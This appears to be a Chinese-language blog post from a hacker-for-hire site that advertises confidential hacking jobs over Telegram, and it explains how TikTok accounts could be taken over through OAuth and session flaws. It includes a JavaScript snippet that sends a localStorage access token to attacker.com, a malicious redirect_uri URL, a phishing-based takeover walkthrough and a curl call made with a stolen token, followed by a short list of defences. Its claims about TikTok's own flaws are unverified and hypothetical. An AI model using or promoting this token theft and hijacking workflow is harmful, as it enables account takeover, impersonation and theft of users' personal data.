• [ 首頁 ]
  • [ 滲透測試 ]
  • [ 駭客技術 ]
  • [ 黑客松 ]
  • [ 聯繫我們 ]
Title: 一條登入連結如何讓你的 TikTok 帳號被駭?
Author: TikTok駭客服務
Date: 2025-06-04

隨著 TikTok 成為全球最受歡迎的社交媒體之一,其巨大的用戶基數也讓其成為駭客目標的焦點。本文將深入探討駭客如何利用 TikTok 認證流程中的安全設計缺陷,繞過身份驗證機制,並最終接管使用者帳號(Account Takeover, ATO)。

提供僱傭駭客接單,全程無接觸保密服務!Telegram: @HackM9

攻擊概述

駭客進行帳號接管的手法通常圍繞在 TikTok 的登入與授權機制上。攻擊者會利用 OAuth 實作漏洞、WebView URL 攔截失效、access token 暴露與 session cookie 重用等問題,從而實現無需密碼的登入繞過。

認證流程設計缺陷分析

1. 不安全的 redirect_uri 使用

TikTok 採用 OAuth 2.0 機制允許第三方應用登入,但若 redirect_uri 未實作白名單限制,攻擊者可構造如下 URL:

https://www.tiktok.com/auth/authorize?client_key=XYZ&redirect_uri=https://attacker.com/callback&state=abc


2. 缺少對 state 的驗證

OAuth 標準中 state 參數應與用戶 session 綁定,用於防止 CSRF 攻擊。但如果 TikTok 忽略檢查 state 值,就可能允許攻擊者使用他人授權碼來進行登入請求。

3. Access Token 可重用、無設備綁定

TikTok 的 access token 一旦發行,可用於調用敏感 API,若未與設備資訊(如 IP、User-Agent、裝置 ID)綁定,則駭客可在其他裝置上直接重用:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR...


即便 victim 在手機登入,攻擊者也能在伺服器或瀏覽器中接管帳號。

4. WebView 攻擊與本地儲存洩漏

某些版本的 TikTok Android App 使用 WebView 登入頁面時,未妥善攔截與過濾跳轉 URL,導致如下攻擊場景:

<script>

 const token = localStorage.getItem("access_token");

 fetch("https://attacker.com/steal?token=" + token);

</script>


若用戶誤點釣魚連結,即可能讓 token 被竊取。

5. sid_tt Cookie 被劫持

TikTok 登入後會產生 sid_tt 等 session cookie,若未設置 HttpOnly 或未搭配 SameSite 限制,可能被 XSS 或中間人攻擊竊取:

Set-Cookie: sid_tt=abc123; Path=/; Secure

攻擊者可用此 cookie 模擬 victim 身份,直接登入 Web 版 TikTok。

攻擊流程模擬(PoC)

  1. 駭客製作釣魚網站,引導受害者點擊登入連結
  2. 使用不安全的 redirect_uri 回傳 token 至惡意伺服器
  3. 攻擊者使用 stolen token 調用如下 API: bash複製編輯curl -H "Authorization: Bearer [token]" https://www.tiktok.com/api/user/info/
  4. 成功接管帳號:可更改暱稱、發布影片、傳送私訊

攻擊可能造成的影響

類型                                 說明

帳號接管                          發送私訊、修改帳號、上傳影片

社交工程                          利用被劫持帳號騙取朋友資料

身份盜用                          擷取用戶姓名、Email、追蹤者清單等個資

機器人農場控制               建立自動化假帳號網路


防禦建議

防禦措施                                                                說明

redirect_uri 白名單                                                僅允許受信任網域

驗證 state                                                              驗證 OAuth 流程中 session 對應

Access Token 綁定設備                                        綁定 User-Agent、IP、Device ID

使用 PKCE (Proof Key for Code Exchange)         增強 OAuth 交換流程

WebView URL 過濾                                               實作 shouldOverrideUrlLoading() 檢查 URL

使用 CSP 與 X-Frame-Options                              防止 iframe/JS 注入


結語

認證流程的設計決定了整個平台的安全基礎。TikTok 雖擁有龐大資源與資安團隊,但若應用實作上稍有疏忽,仍可能造成嚴重風險。開發者與安全工程師應對 OAuth 的每一個環節保持高度警覺,避免使用者在不知情的情況下暴露資料甚至帳號遭駭。

Copyright ©2023 Designed by : Wild Click Creative Agency
[ Telegram ] [ Contact Us ] [ Email:[email protected] ]